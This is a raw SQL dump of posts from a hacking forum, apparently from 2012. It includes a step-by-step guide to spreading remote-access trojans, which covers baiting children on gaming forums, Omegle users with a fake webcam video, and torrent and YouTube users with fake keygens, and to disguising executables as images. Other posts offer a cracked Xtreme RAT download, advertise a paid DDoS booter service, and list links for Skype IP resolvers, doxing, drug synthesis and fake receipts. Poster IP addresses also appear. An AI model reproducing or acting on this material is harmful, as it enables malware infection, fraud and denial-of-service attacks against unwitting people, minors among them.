administration tool software. This procedure usually allows the software tool to avoid being blocked by a firewall, such as used in a router device.\r\nSince the remote \"host\" computer itself is connecting to the remote administrator, it will not be necessary for the remote administrator to know the remote \"host\" computers IP address to send the software tool.\r\n\r\nDirect connection:\r\n\r\nIt is possible to remotely install a piece of software on a computer with the intention of taking control of that computer without the legitimate operator becoming aware of it. This connection type can normally only be made if the remote computer operator has the I.P address of the computer required to be controlled. Most \"firewall\" software usually \"blocks\" this type of invasive software. However, experienced computer software programmers have developed sophisticated programs to \"bypass\" typical firewall software. There is a continual process to produce counter measures against such intrusive software programs.[6]\r\nSecurity is an important factor when choosing a remote support solution for any enterprise. Gone are the days where security was just a matter of the highest degree of encryption. Today, a truly secure remote support solution will allow organizations to centrally control who can do what and where safe in the knowledge that when each remote session has finished it should be able to document what actually took place.\r\nFor systems in environments that need to meet and maintain compliance requirements,[7] remote administration software must have strict security control. Software like Netop Remote Control 10 is able to exceed the toughest security standards including PCI DSS, ISO 27001, FIPS and HIPAA.\r\nIt is necessary to examine[8] the remote control software functionality that best serves organizations that need a highly secure tool that crosses all platforms and devices and is completely scalable in any environment. It will help IT professionals select a remote control solution that increases productivity and customer satisfaction, as well as enhances the flexibility of the IT organization and improves the company’s risk profile.\r\n\r\nRAT trojan horses:\r\n\r\nMany trojans and backdoors now have remote administration capabilities allowing an individual to control the victim\'s computer. Many times, a file called the server must be opened on the victim\'s computer before the trojan can have access to it. These are generally sent through email, P2P file sharing software, and in internet downloads. They are usually disguised as a legitimate program or file. Many server files will display a fake error message when opened, to make it seem like it didn\'t open. Some will also kill antivirus and firewall software. RAT trojans can generally do the following:\r\nBlock mouse and keyboard\r\nChange your desktop wallpaper\r\nDownload, upload, delete, and rename files\r\nDrop viruses and worms\r\nEdit Registry\r\nFormat drives\r\nGrab passwords, credit caard numbers\r\nHijack homepage\r\nHide desktop icons, taskbar and files\r\nLog keystrokes, keystroke capture software\r\nOpen CD-ROM tray\r\nOverload the RAM/ROM drive\r\nPrint text\r\nPlay sounds\r\nControl mouse or keyboard\r\nRecord sound with a connected microphone\r\nRecord video with a connected webcam\r\nShutdown, restart, log-off, shutdown monitor\r\nSteal passwords\r\nView screen\r\nView, kill, and start tasks in task manager\r\nA well designed RAT will allow the operator the ability to do anything that they could do with physical access to the machine. Some RAT trojans are pranks that are most likely being controlled by a friend or enemy on April Fool\'s Day or a holiday. Prank RATS are generally not harmful, and won\'t log keystrokes or store information about the system on the computer. They usually do disruptive things like flip the screen upside-down, open the CD-ROM tray, and swap mouse buttons. However, they can be quite hard to remove. It is much safer (in terms of law) to use a VBS script instead, as you can get the same results without getting in trouble by the police for a minor \"April fool\'s joke\". See: Script kiddie\r\n\r\nTypical RAT software and trojans:\r\n\r\nBack Orifice\r\nBandook RAT\r\nBifrost\r\nDarkComet RAT\r\nLANfiltrator\r\nOptix Pro\r\nPoison Ivy\r\nProRat\r\nSub Seven \r\nY3K Remote Administration Tool\r\nBlackshades NET\r\nXtreme RAT\r\nLostdoor\r\nCyberGate\r\nPytho RAT\r\nnJrat\r\n-------------------------------------------------------------\r\n\r\nHope this helped ppl that where wondering\r\nthe difference between these two types\r\nof programs :)\r\n\r\n~neonlights~[/align]', '67.68.75.99', '1128549219', '1', '0', '0', '0', '1', '7b781f7f58fb229220a832961895a0a2', '0', '0'); INSERT INTO mybb_posts VALUES('4167', '789', '4106', '19', 'RE: ratters', '0', '203', 'NeonLights', '1349904166', 'wich post? lol\narent all my posts HQ D:', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', 'd1f9f87e26454d0a2ff21441f79dd293', '0', '0'); INSERT INTO mybb_posts VALUES('4168', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349904273', '-_- I never said they weren\'t lol I was referring to the Darkcomet one though', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '5aae4a10b4ea74dafe2c4bb40c77b514', '0', '0'); INSERT INTO mybb_posts VALUES('4169', '789', '4106', '19', 'RE: ratters', '0', '62', 'R?????zo?', '1349904441', 'maybe you could help me setup my DC, I don\'t own a crypter but I\'ve asked someone else to FUD it for me and it\'s just gets broken.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ab46e168153993ce247885dbd9846ba5', '0', '0'); INSERT INTO mybb_posts VALUES('2743', '544', '0', '12', '[Tutorial] Epic RAT Spreading Guide | Detailed Methods', '0', '203', 'NeonLights', '1348862068', '[align=center]neonlights presents, a guide to successfully spreading!\r\n\r\nIn the last time i saw a lot of people asking for help with spreading there keylogger or there RAT.\r\nNow i decided to make a huge tutorial on spreading to help the community.\r\nI will start with very basic and famous stuff like youtube and also a few advanced methods.\r\n\r\nGeneral Things you need:\r\n\r\na RAT (ready set-up, make sure its working)\r\na crypter (you will get a lot more victims if your server is FUD)\r\na filehost (for example fileave or dropbox)\r\na computer\r\na brain would not be bad ;D\r\n\r\nMethods:\r\n\r\n1). Youtube\r\n\r\nIn my opinion the most famous and easiest method.\r\nIt is great if you want to target a special group like people with special accounts, for example steam.\r\n\r\n1. Go to youtube.com and register a account if not allready done.\r\n2. In my example i will target people with steam accounts, so i look for some videos with the title \"Steam Hack\" or \"Black Ops Hack/Keygen\" or something like that. You also can look for a paypaal hack video, you will find something you like.\r\n3. When you found a good video, go to keephd.com and download the video in your preferred quality.\r\n4. Then go back to youtube and upload the downloaded video.\r\n5. While uploading, think about an attractiv title for the video, for example \"Black Ops Keygen 100% Working !!!\". In the description put a small text, for example a readme and your server.exe download link.\r\n6. When its uploaded your done.\r\n\r\nTips:\r\n-At the beginning your views and downloads will only increase slowly but they raise fast and you get a good amount of downloads.\r\n- It can help to use a youtube bot to increase views, thumps up etc. to make your video more legit looking, or ask a few friends you haveBiggrin\r\n\r\n2). Forums\r\n\r\nFirst of all i dont mean hackforums.net !!!! I dont want anybody posting malware here !!!\r\nIn my opinion its another simple method.\r\nThere are alot of big and activ forum to post some malware.\r\nThe best choice are forums with a lot of young members because they download everything they can get and that sounds cool and interesting (i am talking from my own experienceBiggrin).\r\n\r\n1. Look for a big forum on google. It will come up a lot of them, i would take one from the first google page. Easiest Forums to spread are gaming/cheating forums because most of them are kids or teenager.\r\n2. Create a new account there with a cool username ( it should look trusting, not \"l33t-haxxor\" or \"i hack you\" ).\r\n3. Design your profile with avatar, signature, some fake details like you want.\r\n4. Make some HQ threads to catch the members attention and make you looking more trusted.\r\n5. After a time make a new thread about a new simple UD wallhack or a working keygen you coded in the last time. Make the thread attractiv and detailed to catch the readers eye. You should add a detailed feature list, screenshots and maybe a short video.\r\n6.You are done. Wait for the first kids downloading your file.\r\n\r\nTips:\r\n- Make multiple accounts to answer to your thread and vouch for you. These account should also look legit to the others, so not 1 time posters or joined 1 minute before.\r\n\r\n3). Torrents\r\n\r\nAnother Easy method that will get some easy Bots for you.\r\n\r\n1. Download a torrent program like BitTorrent here: \"Guests cannot see links in the messages. Please register to forum by clicking HERE to the see links.\"\r\n2. Install BitTorrent if not allready done\r\n3. Go to file -> Create new Torrent\r\n4. Look for your file and select it. Now a new torrent with your file will be created.\r\n5. Go to a famous torrent site like Piratebay.org\r\n6. Upload your new torrent to the site with a detailed description. As title choose something like a paypaal hack or a BF3 Beta keygen, something that will attract many people.\r\n\r\n4). Omegle\r\n\r\nThis is more complicated because you dont get that many downloads, you have to work for each one.\r\nThere are diffrent omegle methods, you only can post your server link to each of them and say its a photo package, but thats not working good.\r\nI give you a better method. I think many will know it:\r\n\r\n1. Download the program ManyCam which allows you to use a virtual webcam.\r\n2. Install Manycam\r\n3. Download this video pack of a girl. It can wave and do some other things. Download: \"Guests cannot see links in the messages. Please register to forum by clicking HERE to the see links.\"\r\n(this is not my video package, but i used it a few times. Thanks to whoever posted thisBiggrin)\r\n4. Start omegle, ss soon as you get into a conversation with somebody go to your many cam and start the \'Wave\' clip.. So it waves at the person and looks very legit.\r\n5. Start a conversationen about some normal things with him/her.\r\n6. After that ask if he/she wants to see some pictures.\r\n7. Sent him your server.exe or your JavaDriveBy and your done if he opened it.\r\n\r\nTips:\r\n- If you fail, you can retry as often as you want\r\n- You should replace the server.exe icon with a jpg icon and may hide the file ending to make it more legit.\r\n\r\n5). JavaDriveBy\r\n\r\nJavaDriveBys are great. You put them on a site and everyone who visits this site download a hidden file and executes it. If your server is FUD, Most people will not notice something is wrong.\r\nI will present you a very simple java drive by, you can search the forums to find more advanced ones.\r\n\r\n1. Go to dot.tk\r\n2. In the URL field enter your direct server link.\r\n3. After loading the url, you can change the name of the url to something good looking, for example \"paypaal-hack.tk\" or \"naughty-nude-girls.tk\".\r\n4. After getting this link you can spread it everywhere you want.\r\n\r\nTips:\r\n-You can spread this with the help of other methods in this tutorial. Say you made a cool new website with a lot of hacking tools and software or you want to show your new website and the people will click on it because they are interested on your site.\r\n\r\n6). PTC Sites\r\n\r\nPTC sites are sites that pay you for visiting links or sites for a short time.\r\nFor this method we will use a JavaDriveBy that we will advertise on a PTC site for a low amount of money. You will get 2000 views on your link for only $1\r\n\r\n1. First of all make your JavaDriveBy ready to work.\r\n2. Then look for a big PTC company. Many of them are scam, but there are a few ones that are ok. I take the site paidtoclick.in\r\n3. Make a new account there and make it ready to work.\r\n4. Click on the advertise button\r\n5. Click on the \"Buy Now\" Button besides the \"Link ad Hits\". Try with $1\r\n6. Create a new link with a title you want, for example money making software or something like that.\r\n7. Put your JavaDriveBy into the target URl field. Leave the rest blank.\r\n8. Then pay for it and wait for the victims Biggrin\r\n\r\ntips:\r\n-The more money you invest the more victims you get.\r\n-Try to do it on diffrent PTC sites that are activ.\r\n\r\n7). Auto Spreader\r\n\r\nAuto Spreaders or worms are a helpful thing in spreading.\r\nYou put your file on a little server and it spreads itself from every slave to other people.\r\nMany worms use facebook, msn, 4chan and other communities or chat programs to spread itself.\r\nYou can spread your worm with the help of the methods\r\nabove and you will multiple your victims\r\nand spreading work.\r\n\r\nThanks for reading my Guide, please post a little feedback or give me stuff to edit or make better\r\n\r\nbefor doing all of that u will need to FUD UR SERVER![/align]', '67.68.75.99', '1128549219', '1', '0', '1', '1352011708', '1', 'e792811358d536131632ff4fe70f1ba6', '0', '1352011708'); INSERT INTO mybb_posts VALUES('4157', '798', '0', '15', 'Xtreme Rat 3.5 Cracked', '0', '203', 'NeonLights', '1349887149', '[align=center][img]http://4.bp.blogspot.com/-jTh9TxZucbI/UBK-PDIEwiI/AAAAAAAAAjY/ZfTMIZsfXzo/s1600/LogotipoXtremeRAT.png[/img]\n\nThis is a tool that allow you to control your computer from anywhere in world.\nWith full support to Unicode language, you will never have problem using this software.\nHere you can find new updates, informations and tutorials about this software.\nSend suggestions or problems reports to xtremerat@hotmail.com or newxtremerat@gmail.com\n\nFor More Information Go to the site Official : http://sites.google.com/site/nxtremerat/\n\n[img]http://imageshack.us/a/img832/8792/53998455.png[/img]\n\nVersion 3.5\nChanges:\n\n- Added option to Enable or Disable Skins\n- Added option to change creation date of your servers (Select Hide Server)\n- Added Firefox version 10 passwords\n- Option to change groups fixed\n- New skins added (download skins.zip and extract it into skins folder)\n- Option to select a notify image of each server\n- Many small improvements and bugfixes\n- Only €40 for unlimited connections and free updates.\n- FUD version, unlimited connections and free updates €100 \n\nLoL €100 Don\'t forget :) here everything is FREE\n\n[lock]download: http://www.mediafire.com/?lnrwp4lrgc57fli[/lock]\n\nxtreme rat password to login is: 154326\nenjoy[/align]', '205.237.34.10', '-840097270', '1', '0', '1', '1352010978', '1', '924ecd718f988244143351bba650889d', '0', '1352010978'); INSERT INTO mybb_posts VALUES('2745', '546', '0', '15', 'OverTheRainbow\'s ProxyScanner v1.2', '19', '203', 'NeonLights', '1348862219', '[align=center][img]http://s19.postimage.org/us8ie489v/Capture.png[/img]\n\n\nWhat does it do?\nLike Proxy Checker (or any other proxy testing program) you load in a .txt list of proxy servers in the format of host:port, and it scans through them, determines which of them respond and saves the ones that do.\n\n\n\nHow do I use it?\nIt\'s a .jar file compiled using JDK 1.7, so you\'ll need JRE 7 to run it. You can download that here.\nOnce you run it, you simply select the .txt file that contains your list of proxies (usually generated by a program like ProxyFinder), select the number of threads you want it to use (the more threads, the faster it\'ll work - select as many threads as you think your PC can handle for the best results) and wait for it to do its magic! When it\'s done checking through the list you loaded it\'ll automatically save the responding proxies to a .txt file called workingProxies.txt in the same directory as the program.\n\n[lock]download: http://adf.ly/382489/http://www.mediafire.com/?dkfwdidjp7a4qw3[/lock]\n\nenjoy guys :)[/align]', '67.68.75.99', '1128549219', '1', '0', '1', '1352011371', '1', 'b66f7ff16f2c00ccb607cc4fc538b095', '0', '1352011371'); INSERT INTO mybb_posts VALUES('2746', '547', '0', '19', '[Junk][Junk]Closed by neon', '0', '203', 'NeonLights', '1348862436', 'content removed by neon\r\nreason: links arent working...', '67.68.75.99', '1128549219', '1', '0', '203', '1348870130', '1', '899b46efc120e81e227b8cf10c54fa48', '0', '1348870130'); INSERT INTO mybb_posts VALUES('2767', '547', '2746', '19', 'RE: Closed by neon', '0', '82', 'iTzIpod', '1348871231', 'Reported thread. Will be junked soon.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7bb39114da9b8ed0e350d8f9dfb58c4f', '0', '0'); INSERT INTO mybb_posts VALUES('2768', '547', '2746', '19', 'RE: Closed by neon', '0', '61', 'NXK', '1348872759', 'I removed my link, You didn\'t have to take down the thread man, No hard feelings don\'t worry.\n[hr]\nThis thread has been junked.\n[hr]\nThis thread has been junked.', '99.253.94.204', '1677549260', '1', '0', '61', '1348872787', '1', '0619d1dd4cbd00cc4917b69da6774a01', '0', '0'); INSERT INTO mybb_posts VALUES('2758', '550', '0', '61', '[Method] 10,000 views a day', '0', '82', 'iTzIpod', '1348868820', '[align=center]\r\n\r\nNote : Not My Method\r\n\r\n\r\n[color=#0000CD]This is the account i did the tut on \r\nhttp://adf.ly/DGdPS\r\n\r\n2 Second Video Download Link \r\nhttp://adf.ly/DGdOF\r\n\r\n\r\nText Tut \r\n1.upload videos about 2 seconds long \r\n2.set them to private so only you can see it \r\n3.go to video manager \r\n4.right click on the videos and then open them in a new tab \r\n5.open them 10 times and do it untill 250 views \r\n6.wait about 4 to 24 hours and you will get the views \r\n\r\nyou can also get partnered easier because if you do 2000 views a day you might get accepted by tgn e.t.c \r\n\r\nremember you can do this to more than one video\r\n\r\n\r\n[/color][color=#FF0000]There is a quicker way\r\n\r\n1.Download a auto refresher on google chrome or firefox\r\n2.Log on to a different youtube account\r\n3.Go on to the video you want views on \r\n4.Go on to auto refresher and set the settings to two seconds and just leave the tab open and you will get loads of views\r\n5.Also the views do not freeze at 300 and you do not get banned[/color][/align]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e501c12f743bbf1cb958ff595e25c0b4', '0', '0'); INSERT INTO mybb_posts VALUES('2747', '548', '0', '15', '{Dual APIs and 227 Shells} [HOT] SuperBooter [PMs] [LONG BOOT TIMES] # [API + SHELLS]', '2', '203', 'NeonLights', '1348863073', '[align=center][img]http://i.imgur.com/XsWe4.png[/img]\n[+] 200+ shells, adding more daily\n[+] UDP flood\n[+] Easy to use interface\n[+] Secure login system\n[+] Attack logs\n[+] Skype and Cloudflare resolvers\n[+] Great staff to help\n[+] Small amount of users\n[+] 2 API\'s\n[+] 1.7 GB/s booting\n\n[img]http://i.imgur.com/hjrGS.png[/img]\n[+] APIs\n[+] More dedicated shells\n[+] AutoBuy\n\n[img]http://i.imgur.com/YTWIT.png[/img]\n\n[img]http://i.imgur.com/XDrvU.png[/img]\n- 120 Seconds Boottime\n- $5 per month\n\n[img]http://i.imgur.com/OSzHu.png[/img]\n- 170 Seconds Boottime\n- $7 per month\n\n[img]http://i.imgur.com/XQMKQ.png[/img]\n- 200 Seconds Boottime\n- $9 per month\n\n[img]http://i.imgur.com/38ee8.png[/img]\n- 350 Seconds Boottime\n- $10 per month\n\n{Lifetime Package}\n- 480 Seconds Boottime\n- $25 one-time payment\n\n[img]http://i.imgur.com/mOdfx.png[/img]\nTERMS OF SERVICE:\n- Do NOT attack sites that are .gov or .edu\n- Do NOT attack sites repeatedly\n- Do NOT share an account\n- We are NOT responsible for your actions; you take full legal responsibility if you get in trouble!\n\nIf you break these rules, you will be banned without refund. I don\'t think it\'s too much to ask.\n\nVouch Copies available: NO VOUCHES ANYMORE SO DONT ASK!\n\nSupport Us!\nBy Telling Ur Friends About Us! :D\n\nPM NeonLights For Purchasing Info Or Add Him On skype\nThx :)[/align]', '67.68.75.99', '1128549219', '1', '0', '203', '1348864172', '1', 'a10612c0151e10d51f8aa4f46f52db27', '0', '1348864172'); INSERT INTO mybb_posts VALUES('2748', '547', '2746', '19', 'RE: Collection Of Skype Resolvers', '0', '82', 'iTzIpod', '1348863496', 'Thanks for the contribution.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8886551b1cbbb0a011bd23bc75352cd9', '0', '0'); INSERT INTO mybb_posts VALUES('2749', '539', '2736', '4', 'RE: YO WHAT UP!', '0', '82', 'iTzIpod', '1348863576', 'Welcome to the forum dude. Don\'t worry. t3h jok3r probably asked you. You will get your upgrade soon probably when he logs on.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '59c23b3e9b1117ee3f2f6c44e70c33ad', '0', '0'); INSERT INTO mybb_posts VALUES('2750', '547', '2748', '19', 'RE: Collection Of Skype Resolvers', '0', '203', 'NeonLights', '1348863769', '[quote=\'iTzIpod\' pid=\'2748\' dateline=\'1348863496\']\nThanks for the contribution.\n[/quote]\n\nur welcome :) just wanted to share my awsomme threads :D just aded u on skype btw', '67.68.75.99', '1128549219', '1', '0', '203', '1348863817', '1', 'ede4eb92fd3fedf80bb5e07ae0e03052', '0', '1348863817'); INSERT INTO mybb_posts VALUES('2751', '538', '2732', '63', 'RE: Staff userbar', '0', '2', 'Apathy', '1348863869', 'I will give it a go later.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', 'e6f115d1c96474709e0c3126ed41694a', '0', '0'); INSERT INTO mybb_posts VALUES('2752', '539', '2749', '4', 'RE: YO WHAT UP!', '0', '203', 'NeonLights', '1348863919', '[quote=\'iTzIpod\' pid=\'2749\' dateline=\'1348863576\']\r\nWelcome to the forum dude. Don\'t worry. t3h jok3r probably asked you. You will get your upgrade soon probably when he logs on.\r\n[/quote]\r\n\r\n:) this forum is pretty chill :)\r\nlooks better then ubers and hackforums...\r\njust need minor fixes and more ppl', '67.68.75.99', '1128549219', '1', '0', '0', '0', '1', 'e90f125d8677c8ca1667ada420cb2c22', '0', '0'); INSERT INTO mybb_posts VALUES('2753', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '2', 'Apathy', '1348863988', 'Not bad. 6/10 There is to much white and it does not really jaw a consistent flow. Keep it up though.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '6f28df9ced777c1902aaab6cc48c2456', '0', '0'); INSERT INTO mybb_posts VALUES('2754', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '82', 'iTzIpod', '1348866259', 'Gee... Thanks I guess...\n\n\nWorked 2 days for that.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '40a6f662548412993260745cbb4d26b6', '0', '0'); INSERT INTO mybb_posts VALUES('2755', '547', '2746', '19', 'RE: Collection Of Skype Resolvers', '0', '82', 'iTzIpod', '1348866305', 'Also, some of the links are invalid.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5071626ee163ff905a455ca770928921', '0', '0'); INSERT INTO mybb_posts VALUES('2756', '549', '0', '35', 'HQ Thread Design', '0', '82', 'iTzIpod', '1348868557', 'Hello,\nThis is from HF,\n\n[img]http://www2.picturepush.com/photo/a/10191170/img/10191170.jpg[/img]\n\nHF Link: http://www.hackforums.net/showthread.php?tid=2893720\n\n[url=http://adf.ly/DGdB2][align=center]Click to download[/align][/url]', '24.212.197.164', '416597412', '1', '0', '82', '1348868603', '1', '28962db312c7eb4d020658a4df2a8db5', '0', '1348868603'); INSERT INTO mybb_posts VALUES('2757', '547', '2746', '19', 'RE: Collection Of Skype Resolvers', '0', '61', 'NXK', '1348868704', 'My skype resolver had a adf.fly link I didn\'t give permission to re leak with out it. And my skype resolver it down.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '753bfc34f9a1737a932ae4d10bab786c', '0', '0'); INSERT INTO mybb_posts VALUES('2759', '551', '0', '61', 'Dexter\'s Thread Design', '0', '82', 'iTzIpod', '1348868901', 'Dexter was editing and sending this to a few people just as a finished image, but to get the psd it cost $3.00, so here is the PSD :hurr:\n\nPreview:\n[IMG]http://i.imgur.com/R477M.png[/IMG]\n\n[size=large][url=http://http://adf.ly/DGdd4]DOWNLOAD![/url][/size]', '24.212.197.164', '416597412', '1', '0', '82', '1348868922', '1', '8c5170e2e6e73a9b45f020119d1c0616', '0', '1348868922'); INSERT INTO mybb_posts VALUES('2760', '552', '0', '61', 'Bunch of eBooks', '0', '82', 'iTzIpod', '1348869024', 'Download: http://adf.ly/DGdhk\r\n\r\nThis contains over 5 eBooks that I don\'t think are on L33tHacking yet.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '534fcf93c70960d5e5fbbb197d8109f1', '0', '0'); INSERT INTO mybb_posts VALUES('2761', '553', '0', '61', 'How to Control Coke Machines (Tutorial)', '0', '82', 'iTzIpod', '1348869149', 'To View: http://adf.ly/DGdrJ\r\n\r\nTo Download: http://adf.ly/DGdub', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9afb9de7d2b5bb6e0b09efd33c9d29d', '0', '0'); INSERT INTO mybb_posts VALUES('2762', '554', '0', '61', 'eBook ($4/Day)', '0', '82', 'iTzIpod', '1348869361', 'Here is an E-book on how to get 4$ a day by doing hardly anything.\r\n\r\nTo View: http://adf.ly/DGe0n\r\nTo Download: http://adf.ly/DGeFA\r\n\r\n\r\nLet me know what you think of it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2703891e0ea99c739a5e245c3ea3ce29', '0', '0'); INSERT INTO mybb_posts VALUES('2763', '555', '0', '61', 'Apple Method', '0', '82', 'iTzIpod', '1348869508', 'I\'m feeling generous... it works, but involves boxing. I created it myself, and normally sell it for $100, so please don\'t bash this thread. I may release my gc method publicly (once I\"m green or something). We\'ll see. Anyways, enjoy. Use this information at your own risk. I am not responsible for what is done with this material. Also note it is for educational purposes only.\r\nTo View: http://adf.ly/DGeMU\r\nTo Download: http://adf.ly/DGeFA\r\n\r\nPW to PDF: SquillyCreated', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '92c3acf29843f699928c83be915fa42f', '0', '0'); INSERT INTO mybb_posts VALUES('2764', '556', '0', '61', 'Free Skype IP Resolver - WebBased', '0', '82', 'iTzIpod', '1348869725', 'ust register on their site. Once you are in you\'ll be redirected to booter page, just insert the skype username :)\r\n\r\n100% vouche this resolver\r\n\r\n\r\n[b][url=http://adf.ly/DGekT]Register and start resolving[/url][/b]\r\n[/quote]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'be62f9f250f8688fd903a5d6da02a80d', '0', '0'); INSERT INTO mybb_posts VALUES('2765', '557', '0', '61', '? ? MASSIVE COLLECTION OF HQ AND USEFUL EBOOKS & TUTORIALS ? ?', '0', '82', 'iTzIpod', '1348869795', '[align=center]\r\n[url=http://www.mediafire.com/view/?biy08kvh6mai1yd]How to Create Your First Website and Make Money[/url]\r\n\r\n[url=http://www.mediafire.com/view/?ed34t591ygaom7u]How to Make Software and Make Money From It[/url]\r\n\r\n[url=http://www.mediafire.com/view/?u3qqh3ljzsixnyf]Secrets to Wild Sex[/url]\r\n\r\n[url=http://www.mediafire.com/view/?f8ssy1y6qp16t1z]How to Get Free Mcdonalds[/url]\r\n\r\n[url=http://www.mediafire.com/view/?8wwah0c1ggsf3g7]How to Pick Any Lock Guide 1[/url]\r\n[url=http://www.mediafire.com/view/?0r668tw8i461u0x]How to Pick Any Lock Guide 2[/url]\r\n\r\n[url=http://www.mediafire.com/?sa7t8sz31he9hxt]12,000 Essays[/url]\r\n\r\n[url=http://www.mediafire.com/?dfzoymd23wxpq2p]Thousands Of Public and Private Shells[/url]\r\n\r\n[url=http://www.mediafire.com/?zutdxua3het34z4]How to Grow Medical Marijuana[/url]\r\n\r\n[url=http://www.mediafire.com/view/?cp1xnc27fxqci8d]How to Grow Magic Mushrooms[/url]\r\n[url=http://www.mediafire.com/?dadjl31ht2ehej7]How to Make Hash Oil[/url]\r\n[url=http://www.mediafire.com/view/?2x2239rlqok04pn]How to Make LSD[/url]\r\n[url=http://www.mediafire.com/view/?f6395d1t5cxnty3]How to Make Ecstasy[/url]\r\n\r\n[url=http://www.mediafire.com/view/?dy69a572q67o1ss]How You Can Learn Any Language In A Fraction Of The Time You Spend Learning By Traditional Methods[/url]\r\n\r\n[url=http://www.mediafire.com/?t4el45rmgdtsuy6]How to Be Completely Anonymous and Hidden[/url]\r\n\r\n[url=http://www.mediafire.com/?1ox74cpgiagpxq6]Learning Japanese[/url]\r\n\r\n[url=http://www.mediafire.com/view/?mdgeca33erysmcv]Free Soft Drinks + Snacks[/url]\r\n\r\n[url=http://www.mediafire.com/view/?socw11k1ksa6bz6]How to Lose Weight[/url]\r\n\r\n[url=http://www.mediafire.com/view/?rpwna55ja1rb1ga]How to Get Free NetFlix[/url]\r\n\r\n[url=http://www.mediafire.com/view/?ko4tuigz3gol1r2]Life Hacks[/url]\r\n\r\n[url=http://www.mediafire.com/?y7kulgcptpsy0pu]Everything You Need to Know About Lucid Dreaming and Sleep Paralysis[/url]\r\n\r\n[url=http://www.mediafire.com/view/?xat9ulxh7dcihol]Anti-Forensics Guide[/url]\r\n\r\n[url=http://www.mediafire.com/view/?8qf2dvlf22lb853]Dox Methods[/url]\r\n\r\n[url=http://www.mediafire.com/view/?y599kjnlcfl88mg]How to Get Free Alienware Laptops[/url]\r\n\r\n[url=http://www.mediafire.com/?dj08l0m7osb8rn1]How to Get a Free Kindle Fire or DX[/url]\r\n\r\n[url=http://www.mediafire.com/view/?uid83k05ym82814]How to Get Free Games From Blockbuster[/url]\r\n\r\n[url=http://www.mediafire.com/view/?3tb9xp16i12ceva]How to Get Free Subway For Life[/url]\r\n\r\n[url=http://www.mediafire.com/view/?7q8zeol68qgl03l]How to Get a Free Whopper[/url]\r\n\r\n[url=http://www.mediafire.com/view/?5jr5mif63auev57]How to Get Free Stuff From eBay[/url]\r\n\r\n[url=http://www.mediafire.com/view/?asp757ohu8hlhv8]How to Get Free Nike Fuel Bands[/url]\r\n\r\n[url=http://www.mediafire.com/view/?1j16dl9y40h7cf4]Strategic Blog Traffic[/url]\r\n\r\n[url=http://www.mediafire.com/?i3h116bcdcbbw7z]Fake Coupons For Discounts and Free Stuff (USA Only)[/url]\r\n\r\n[url=http://www.mediafire.com/?bndw39s25b6acb5]Amazon Receipt Generator[/url]\r\n\r\n[url=http://www.mediafire.com/view/?dk6k9s7se10cerp]How to Get The Caller ID of an Unknown Number[/url]\r\n\r\n[url=http://www.mediafire.com/view/?f20hcjli4tg4a9z]How to Get Approved By File Ice[/url]\r\n\r\n[url=http://www.mediafire.com/view/?9h6ec51w3zdl8dj]Google Detonator 2.0[/url]\r\n\r\n[url=http://www.mediafire.com/view/?665mcnhbgnfhw1i]How to Get Your Own Mastercard [Legal, Free and Worldwide! Any Age!][/url]\r\n\r\n[url=http://www.mediafire.com/view/?orhvxfhd65xx6iv]100,000 U.S.A. Email Addresses[/url]\r\n\r\n[url=http://www.mediafire.com/view/?v0jp65pq7fiqcvm]How to Get Almost Any Woman to Have Sex With You[/url]\r\n\r\n[url=http://www.mediafire.com/view/?vhweqqbbcl8jw6k]How to Touch A Girl[/url]\r\n\r\n[url=http://www.mediafire.com/view/?fbry435375qjz7r]10 Masturbation Tips From Women[/url]\r\n\r\n[url=http://www.mediafire.com/view/?z5rx4wlpp47vgfn]How to Instantly Attract Any Woman You Want[/url] \r\n\r\n[url=http://www.mediafire.com/view/?12ibili9v5b55pt]How To Get A Girl\'s Number In 3 Minutes[/url]\r\n\r\n[url=http://www.mediafire.com/?83b9nv7ffybdytg]IMnuke VIP Section LEAKED[/url]\r\n\r\n[url=http://www.mediafire.com/?6kfyffftcz3przn]4746-1 Million Serial Numbers of Different Softwares[/url]\r\n\r\n[url=http://www.mediafire.com/?6njhzd07ejydqdh]Forum Bot 2.4[/url]\r\n\r\n[url=http://www.mediafire.com/?mktb6tvnslyj901]International SMS Bomber[/url]\r\n\r\n[url=http://www.mediafire.com/?c49dp5z2da5aojz]Fraps[/url]\r\n\r\n[url=http://www.mediafire.com/?tfi9jkx4dhyi4wt]MineCraft Server[/url]\r\n\r\n[url=http://www.mediafire.com/?hdj301wpfxpjie3]BlackHat Library[/url]\r\n[/align]\r\n\r\n\r\n[align=center][url=http://www.mediafire.com/?7xey64ytiv35oqz]4,000 eBooks[/url]\r\n[spoiler][url=http://pastebin.com/iZdyHpA3]View Titles Here[/url][/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?gxklx5zd4wd3scw]Exploiting (25 MB)[/url]\r\n[spoiler]\r\nExtreme Exploits - Advanced Defenses Against Hardcore Hacks (2005)\r\nHacking - The Art Of Exploitation (2003)\r\nShellcoder\'s Programming Uncovered (2005)\r\nThe Shellcoder\'s Handbook - Discovering And Exploiting Security Holes (2004)[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?cbguuhw9z0gqpq3]Hacking (77 MB)[/url]\r\n[spoiler]\r\nBatch File Programming\r\nCracking The Coding Interview - 4th Edition\r\nDictionary Of Networking\r\nHacker Linux Uncovered (2005)\r\nHacker\'s Delight (2002)\r\nHacker\'s Guide\r\nHacker\'s Handbook\r\nHackers_Secrets\r\nHacking Exposed - Network Security Secrets & Solutions, 2nd Edition (2001)\r\nHacking For Dummies (2004)\r\nHacking For 